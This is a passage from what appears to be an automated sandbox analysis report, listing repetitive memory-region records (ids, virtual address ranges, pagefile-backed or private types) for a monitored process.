= 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22158 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22159 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22160 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22161 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22162 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 22163 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22164 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22165 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22166 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 22167 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22168 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22169 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22170 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22171 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22172 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22173 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22174 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22175 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22176 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22177 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22178 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22179 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22180 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22181 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22182 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22183 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22184 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22185 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22186 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22187 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22188 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22190 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22191 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22194 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22196 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22197 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22198 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22199 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22200 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22201 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22202 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22203 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22204 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22205 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22206 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 22207 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22208 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22209 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22210 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22211 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22212 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22213 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22214 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22215 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22216 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22217 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22218 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22219 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22220 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22221 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22222 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22223 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22224 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22225 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22226 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22227 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22228 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22229 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22230 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22231 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22232 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22233 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22234 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22235 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22236 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22237 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22238 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22239 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22240 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22241 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22242 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22243 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22244 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22245 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22246 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22247 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22248 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22249 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22250 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22251 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22252 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22253 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22254 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22255 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22256 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22257 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22258 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22259 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22260 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22261 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22262 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22263 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22264 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22265 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22266 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22267 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22268 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22269 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22271 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22272 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22275 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22276 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 22277 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22278 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22279 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22280 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 22281 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22282 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22283 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22284 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 22285 start_va = 0x1e80000 end_va = 0x1e81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 22286 start_va = 0x49d0000 end_va = 0x49f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 22287 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22288 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22289 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22291 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22292 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22293 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22294 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22295 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22296 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22297 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22298 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22299 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22300 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22301 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22302 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22303 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22304 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22305 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22308 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22309 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22310 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22311 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22312 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22313 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22317 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22318 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22319 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22320 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22321 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22322 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22323 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22324 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22325 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22326 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22327 start_va = 0x1ea0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 22328 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22329 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 22330 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 22331 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22332 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22333 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22334 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22335 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22336 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22337 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22338 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22339 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22340 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22341 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22342 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22343 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22345 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22346 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = 